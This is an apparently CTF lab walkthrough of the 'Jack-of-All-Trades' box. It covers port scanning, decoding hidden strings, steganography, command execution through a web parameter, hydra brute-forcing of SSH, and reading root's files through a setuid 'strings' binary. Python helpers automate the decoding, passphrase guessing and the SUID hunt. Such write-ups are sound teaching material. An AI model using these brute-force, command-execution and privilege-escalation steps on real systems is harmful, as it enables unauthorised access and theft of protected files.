# Jack-of-All-Trades

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuBhC1p4kMOhz-hILJ%2F-McuBraVpZmSim70sH5H%2Fimage.png?alt=media\&token=d1c6154a-2ada-4480-9054-b37b984ea21f)

## Scanning

Let's run an nmap scan to find open ports and the services behind them. Read the service column rather than assuming the default service for each port number: on this box the port that is normally SSH is serving HTTP, which is why the next section browses to port 22.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuC0_V42oDeS-PT6ci%2F-McuDHl7IeDl9lvSMlq2%2Fimage.png?alt=media\&token=474a5938-603e-40ba-8a13-3bc773199cde)

## Enumeration

Let's visit the website on port 22. Firefox refuses to load it: port 22 is on the browser's list of blocked ports (it is reserved for SSH), so we get an error page instead of the site.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuC0_V42oDeS-PT6ci%2F-McuE8qiMG41P092tJEu%2Fimage.png?alt=media\&token=c3e07fef-9830-45ff-9832-64355cf6e97b)

This is a client-side restriction only, so we can override it: open `about:config` and search for `network.security.ports.banned.override`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuC0_V42oDeS-PT6ci%2F-McuEXzcDjj8KNZr4mKg%2Fimage.png?alt=media\&token=53296e3f-4b38-45a2-adf7-f747108f0fd7)

Remove any existing entry, then add the preference as a String with the value `22` (a comma-separated list is accepted if more ports are needed). Non-browser clients such as `curl` do not enforce this list at all.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuC0_V42oDeS-PT6ci%2F-McuF7aFDPObhhN8mPZT%2Fimage.png?alt=media\&token=81233c90-5f92-4b15-a95b-b8722c73cc0a)

Now let's visit the site on port 22 again.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuC0_V42oDeS-PT6ci%2F-McuFMrsYxOjx6NeBdk4%2Fimage.png?alt=media\&token=f473628d-1635-4b2d-aecf-1cd6e89e4267)

We have a web page, and it gives us a username, `Jack`. Let's run a gobuster scan in the background while we explore the page.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.182.211:22/
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuNciGJGIm2lMZ-Unt%2Fimage.png?alt=media\&token=83028923-f751-4abe-bc7e-982fbb94afe9)

We get nothing of interest.

Let's look at the page source.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuFqQQoMUZPxKa8K20%2Fimage.png?alt=media\&token=36f4e380-38b9-426f-94aa-f3df5db899db)

The HTML comment reveals a page called `/recovery.php` and an encoded string. The string is base64, and decoding it once only yields more base64, so it has to be decoded twice. Let's decode it with [CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Base64\('A-Za-z0-9%2B/%3D',true\)\&input=VW1WdFpXMWlaWElnZEc4Z2QybHphQ0JLYjJodWVTQkhjbUYyWlhNZ2QyVnNiQ0IzYVhSb0lHaHBjeUJqY25sd2RHOGdhbTlpYUhWdWRHbHVaeUVnU0dseklHVnVZMjlrYVc1bklITjVjM1JsYlhNZ1lYSmxJR0Z0WVhwcGJtY2hJRUZzYzI4Z1oyOTBkR0VnY21WdFpXMWlaWElnZVc5MWNpQndZWE56ZDI5eVpEb2dkVDlYZEV0VGNtRnhDZw).

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuG3TNPnkNFwqias8Y%2Fimage.png?alt=media\&token=20377dd2-445d-4cb0-b30e-a94e599c5b89)

The decoded note contains a password and mentions someone called `Johny Graves`; let's search for him.
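As an added example (not part of the original walkthrough), here is the same decoding done in Python instead of CyberChef. The input is the string from the CyberChef link above; it is base64 applied twice, so the helper peels layers until the output stops looking like base64 and then pulls out the `password:` field. The `max_layers` guard and the printability check are my additions so the loop stops on plaintext that happens to match the base64 alphabet.

```python
import base64
import binascii
import re
from typing import Optional, Tuple

# One layer of standard base64; padding is optional because CyberChef links drop it.
B64_LAYER = re.compile(r"[A-Za-z0-9+/]+={0,2}")

# The string from the HTML comment, copied from the CyberChef link's input.
PAGE_BLOB = (
    "VW1WdFpXMWlaWElnZEc4Z2QybHphQ0JLYjJodWVTQkhjbUYyWlhNZ2QyVnNiQ0IzYVhSb0lHaHBjeUJq"
    "Y25sd2RHOGdhbTlpYUhWdWRHbHVaeUVnU0dseklHVnVZMjlrYVc1bklITjVjM1JsYlhNZ1lYSmxJR0Z0"
    "WVhwcGJtY2hJRUZzYzI4Z1oyOTBkR0VnY21WdFpXMWlaWElnZVc5MWNpQndZWE56ZDI5eVpEb2dkVDlY"
    "ZEV0VGNtRnhDZw"
)

PASSWORD_RE = re.compile(r"password:\s*(\S+)", re.IGNORECASE)


def b64_decode_lenient(text: str) -> bytes:
    """Decode standard base64, restoring any '=' padding that was stripped."""
    text = text.strip()
    return base64.b64decode(text + "=" * (-len(text) % 4), validate=True)


def peel_base64(blob: str, max_layers: int = 8) -> Tuple[str, int]:
    """Base64-decode repeatedly until the result no longer looks like base64.

    Returns (final_text, layers_removed). Stops when a layer is not valid
    base64, does not decode to printable ASCII, or max_layers is reached.
    """
    text, layers = blob.strip(), 0
    while layers < max_layers and B64_LAYER.fullmatch(text):
        try:
            decoded = b64_decode_lenient(text).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break  # not base64 after all, or a binary payload: keep this layer
        if not decoded.strip().isprintable():
            break
        text, layers = decoded.strip(), layers + 1
    return text, layers


def extract_password(message: str) -> Optional[str]:
    """Pull the value after 'password:' out of a decoded note, if present."""
    match = PASSWORD_RE.search(message)
    return match.group(1) if match else None


if __name__ == "__main__":
    message, layers = peel_base64(PAGE_BLOB)
    print(f"base64 layers removed: {layers}")
    print(message)
    print("candidate password:", extract_password(message))
```

The printability check matters: a short word like `Remember` is valid base64 syntactically, and without it the loop would happily "decode" plaintext into garbage.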

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuHt_J12k2e9awJEIk%2Fimage.png?alt=media\&token=cdd5a9c2-05f2-45a5-a789-21659f1e9f9f)

We find his Twitter account and a post describing his favourite `crypto` method, which is an encoding scheme we will need shortly.

Let's now look at the recovery page we found.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuINCIgjM7gEQm5Uki%2Fimage.png?alt=media\&token=b8987aa2-22e4-4713-8d93-3df56cd7dd7c)

It's a password recovery form; let's look at its source.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuIY4Ojzxloy9_BrZt%2Fimage.png?alt=media\&token=d684c4f6-cab1-4eed-9648-d6004cbae995)

There is another encoded string in a comment. Let's decode it with the method from the Twitter post.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuJ7Cngr1VDweF4kbx%2Fimage.png?alt=media\&token=c121b81c-051c-4f58-a679-4624e4e880fa)

The decoded text points at a bit.ly link; let's visit it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuJL0kE9mrZltgQYb6%2Fimage.png?alt=media\&token=a14c9ff6-2218-460f-bc6b-80132c13556a)

It's a page with a dinosaur image. The password is supposed to be on the home page, so let's go back there.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuJV9nn9ow6UOZWHrr%2Fimage.png?alt=media\&token=b5a947e1-a7f0-4d2c-8b22-165b2cd5e252)

The home page has the same dinosaur. The password may be hidden inside the image with `steganography`, so let's first download the image to our machine.

Looking at the source, we can find the link to the image.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuJoftpP-S7skAI3q-%2Fimage.png?alt=media\&token=77b07ae7-ffca-4047-9259-85f000e89e40)

Let's download the image.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuJuTvQ5LNZ8wKBSO4%2Fimage.png?alt=media\&token=9f26ee99-1c49-43f2-a821-9e6c8ebfdcfc)

Let's use `steghide` to look for embedded files. It asks for a passphrase; we can try the one we found when we decoded the first string.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuKNEwALiHiSb1Ejtj%2Fimage.png?alt=media\&token=d07de27f-6c1f-4f92-93f4-d13734d95aa8)

Let's read the extracted file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuKSG-BEC0pxToAQ5m%2Fimage.png?alt=media\&token=e3547931-8609-46f3-ab0b-3b25495330ed)

Damn, that is not what we want. Let's download the other image from the page.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuFh3nGpxDoLteWV2D%2F-McuKehLOkXtuyG59NyP%2Fimage.png?alt=media\&token=2641166c-c86f-4558-b16f-d820f4aac96b)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuKnNlPE-Ucnbw0tmS%2F-McuKq3G4ck_Gff0D3a2%2Fimage.png?alt=media\&token=ce54cc83-e1f4-46f8-9a7c-4d120ff0fee4)

We get another file; let's check it out.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuKnNlPE-Ucnbw0tmS%2F-McuL-o6eTKv_EKmo3Mi%2Fimage.png?alt=media\&token=820f64f3-838c-4095-816b-859937462ecb)
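Automating the passphrase attempts from the two extractions above, as an added example (not from the original walkthrough): `steghide extract` exits non-zero when the passphrase is wrong, so a short loop can try every string collected so far against each image without typing them by hand. The candidate list is constructed for illustration; its first entry is the password recovered from the first decoded note, and the empty passphrase is included because CTF images are often embedded without one. The `run` parameter is my own indirection so the loop can be exercised without `steghide` installed.

```python
import subprocess
from typing import Callable, Iterable, Optional

# Signature of the function that actually invokes steghide: (image, passphrase, out_path).
Runner = Callable[[str, str, str], subprocess.CompletedProcess]


def run_steghide_extract(image: str, passphrase: str, out_path: str) -> subprocess.CompletedProcess:
    """Run `steghide extract` non-interactively; exit status 0 means the passphrase opened the file."""
    return subprocess.run(
        ["steghide", "extract", "-sf", image, "-p", passphrase, "-xf", out_path, "-f"],
        capture_output=True,
        text=True,
        check=False,
    )


def try_passphrases(image: str, candidates: Iterable[str], out_path: str,
                    run: Runner = run_steghide_extract) -> Optional[str]:
    """Try each candidate in order; return the first passphrase that extracts data, else None."""
    for passphrase in candidates:
        if run(image, passphrase, out_path).returncode == 0:
            return passphrase
    return None


# Constructed candidate list (assumption): the password from the first decoded
# note, the empty passphrase, and the username seen on the site.
CANDIDATES = ["u?WtKSraq", "", "jack"]

if __name__ == "__main__":
    # Image filenames are placeholders; use the two files downloaded from the site.
    for image in ("header.jpg", "stego.jpg"):
        hit = try_passphrases(image, CANDIDATES, image + ".extracted")
        print(f"{image}: {'passphrase ' + repr(hit) if hit is not None else 'no candidate worked'}")
```

Because `-xf` names the output file, each image gets its own extracted file and a later attempt cannot overwrite an earlier result; `-f` only matters when you rerun the script.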

We now have a username and a password, so let's log in to the recovery page.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuKnNlPE-Ucnbw0tmS%2F-McuLbi1nqQhGean-MbO%2Fimage.png?alt=media\&token=58967dc7-af0e-442f-97d6-8a268bd4d83f)

## Exploitation

Let's run a command through the `cmd` parameter.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuLrign6VHUaraVjo5%2Fimage.png?alt=media\&token=5b148bc1-ecc4-4508-b117-fdbfe2cbd3bd)

Our commands run, so we have remote code execution on the machine. Let's look around the filesystem for interesting files.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuMFqUgFT4Rx6eDIcW%2Fimage.png?alt=media\&token=dc6ebd85-c215-413b-9fcf-3593d451eaa5)

There is an interesting file; let's read it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuMYDQznVHdrXL0dj1%2Fimage.png?alt=media\&token=172200bf-6cdc-4910-b344-ce81d1914fdd)

It's a list of passwords. Let's copy them to our machine as `passwords.txt`. One of them might be Jack's SSH password, so let's use `hydra` to find out which. Remember that SSH is not on port 22 on this box (that port serves the website), so point hydra at the port the nmap scan showed with `-s`.

First let's save the passwords.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuMzoy-o4Dw6eLHULr%2Fimage.png?alt=media\&token=fa8be12b-1cfb-4f64-a7d5-8855bd4405ca)

Now let's run hydra.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuNDpFjiqh5GtJ-fuF%2Fimage.png?alt=media\&token=dbc4e133-1f4b-403d-b8b6-6d6255bf730f)

We have the password; let's log in over SSH.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuOJghrCdCsQjnf6AA%2Fimage.png?alt=media\&token=de85cf6c-7ff7-4ca0-b1cd-40147da68124)

There is an image in the home directory; let's download it to our machine (`scp` works, using the same non-default port as SSH).

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuOP6vJDqxBlBkv2ho%2Fimage.png?alt=media\&token=51e41140-89e8-4050-8373-40fda3842028)

Let's open the file and see what it says.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuOiHlw_D3zfazrXD_%2Fimage.png?alt=media\&token=b685b00a-48d6-4e19-951c-f66dcb31ceb5)

We have the user flag.

## Privilege Escalation

We have no sudo permissions, so let's look at the `SUID` binaries instead.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuPDGCr4I6Odet86nY%2Fimage.png?alt=media\&token=d011b55e-2332-44f7-9c7b-9af0c51f87cf)

`/usr/bin/strings` is interesting: it is not normally setuid.

Let's get more information about it on [GTFOBins](https://gtfobins.github.io/gtfobins/strings/#suid).

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuPV6ZIvZdA1oeJJ_m%2Fimage.png?alt=media\&token=c53ad66a-81b9-4214-83db-2699328744c8)
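The SUID hunt above, done from Python as an added example (not the walkthrough's own commands): it walks the filesystem the way `find / -perm -4000 -type f` does, flags binaries whose names appear on a short hand-picked subset of GTFOBins entries, and wraps the `strings` trick for reading a file that only root can open. `GTFOBINS_SUID` is an illustrative subset I chose, not the full list, and the `strings` path is assumed to be `/usr/bin/strings` as on this box.

```python
import os
import stat
import subprocess
from typing import Iterator, List, Tuple

# Hand-picked subset (assumption) of binaries whose SUID entry on GTFOBins
# gives file read or a shell. Extend it from the site as needed.
GTFOBINS_SUID = {
    "strings", "base64", "cat", "cp", "find", "vim", "python", "python3",
    "bash", "env", "less", "more", "tail", "xxd", "dd", "nano",
}


def find_suid(root: str = "/") -> Iterator[str]:
    """Yield regular files under root with the setuid bit set (symlinks are not followed)."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entry; keep walking
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path


def triage(paths: Iterator[str]) -> List[Tuple[str, bool]]:
    """Pair each SUID path with whether its basename is on the GTFOBins subset; known ones first."""
    rows = [(p, os.path.basename(p) in GTFOBINS_SUID) for p in paths]
    return sorted(rows, key=lambda r: (not r[1], r[0]))


def read_via_strings(target: str, min_len: int = 4,
                     strings_bin: str = "/usr/bin/strings") -> str:
    """Dump printable runs of `target` through a setuid strings binary.

    strings only prints runs of at least min_len characters (4 by default),
    so lower it for short secrets such as one-line flags.
    """
    result = subprocess.run(
        [strings_bin, "-n", str(min_len), target],
        capture_output=True, text=True, check=False,
    )
    return result.stdout


if __name__ == "__main__":
    for path, known in triage(find_suid("/")):
        print(f"{'GTFOBins' if known else '        '}  {path}")
    print(read_via_strings("/root/root.txt", min_len=1))
```

Run it as the low-privilege user on the target. The setuid bit is only honoured when the filesystem holding the binary is not mounted `nosuid` and the file is a real binary rather than a script, so check both before assuming a flagged entry is exploitable.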

Because `strings` runs with root's privileges, it can read any file regardless of its permissions, so let's run it on `/root/root.txt`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McuLfAX-aWHr1KquTcE%2F-McuPnFDXEcu8PhREH2e%2Fimage.png?alt=media\&token=f94af99e-736c-4559-81bc-c1fdb73bffbc)

We have the root flag.
